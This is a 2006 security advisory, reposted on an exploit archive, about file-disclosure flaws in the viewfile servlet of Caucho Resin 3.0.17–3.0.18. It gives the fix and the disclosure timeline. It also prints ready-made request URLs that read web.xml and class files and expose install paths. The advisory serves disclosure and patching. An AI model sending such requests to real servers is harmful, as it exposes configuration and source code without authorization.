exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

sa-caucho.txt

sa-caucho.txt
Posted May 22, 2006
Site scanalert.com

ScanAlert Security Advisory - Caucho Resin versions 3.0.17 and 3.0.18 suffer from arbitrary file access and information disclosure vulnerabilities.

tags | exploit, arbitrary, vulnerability, info disclosure
SHA-256 | 50f7b2639fa218567771d09c602263b7347f86854398843e9e649c2a91b6e27b

sa-caucho.txt

Change Mirror Download
ScanAlert Security Advisory
http://www.scanalert.com

Caucho Resin Multiple Vulnerabilities - Arbitrary File Access & Information
Disclosure

Date: 5/16/06
Vendor: Caucho
Package: Resin
Version: 3.0.17 and 3.0.18 – Vendor Confirmed
Credit: ScanAlert’s Security and Enterprise Services Teams.

Risk:
Common Vulnerability Scoring System (CVSS) -
http://www.first.org/cvss/intro/
 
Related Exploit Range: Remote
Attack Complexity: Low
Level Of Authentication Needed: Not Required 
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None

Overview

Caucho Resin is a high performance, Sun certified J2EE server featuring load
balancing for increased reliability. Resin is well known for its flexibility
and ease of use, saving both engineering time and staff costs.

Vulnerabilities

Resin contains documentation that is available in the /webapps directory and
is an expanded war file available at /resin-doc by default when using the
standard resin.conf and Resin directory structure for configuring the
application.

This documentation contains a servlet for viewing files within the
integrated tutorial:

http://targetsystem/resin-doc/viewfile/?contextpath=%2Fresin-doc%2Fjmx%2Ftut
orial%2Fbasic&servletpath=%2Findex.xtp&file=index.jsp&re-marker=&re-start=&r
e-end=#code-highlight

The viewfile servlet can easily read any file within the web root with no
parameters:

http://targetsystem/resin-doc/viewfile/?file=index.jsp

It is possible to set the context path outside of the resin-doc and read any
file on alternate web roots:

http://targetsystem/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath
=&file=WEB-INF/web.xml

When resin-doc is installed on a system it is possible to read all files
contained within the web root including class files which can then be
decompiled to view the Java source:

http://targetsystem/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-
INF/classes/com/webapp/app/target.class

An incorrect path in the request will reveal the absolute installation path:

File not found
/C:/customer/sites/deploy/n/wwwroot/WEB-INF/classes/com/webapp/app/non-exist
ant.class

Solution:

Remove the resin-doc.war file from all production systems and do not deploy
using default configuration files. Upgrade to version 3.0.19 or better.

Resolution Timeline:

Vendor Notification: May 5, 2006
Vendor Response: May 9, 2006
Vendor Fix: May 15, 2006
Coordinated public release of advisory: May 16, 2006
----------------------------------------------------------------------------
--------------------------

ScanAlert's mission is to make the web safe from hackers.

We make web sites secure from hackers and certify it to their customers via
our patent pending HACKER SAFE® security certification technology. Our daily
security audits and real-time certification enables consumers to know
whether the sites where they shop are taking the necessary steps to
safeguard their personal information from hackers. By alleviating consumers'
fears of identity theft and credit card fraud, online merchants who earn
HACKER SAFE certification consistently see substantial increases in online
transactions

For additional information regarding ScanAlert and the Hacker Safe program
please contact:

Joseph Pierini, CISSP | Director, Enterprise Services
ScanAlert ( www.scanalert.com)
860 Napa Valley Corporate Way
Suite R
Napa, CA 94558
Phone: 877 302-9965
Int'l: 707 224-7656
Fax: 707 252-9626
Email: joep@scanalert.com


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    14 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    20 Files
  • 30
    Apr 30th
    73 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close